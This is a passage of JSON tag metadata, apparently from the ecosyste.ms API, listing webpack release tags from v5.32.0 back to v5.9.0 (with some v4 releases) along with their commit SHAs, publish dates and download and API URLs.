ags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/we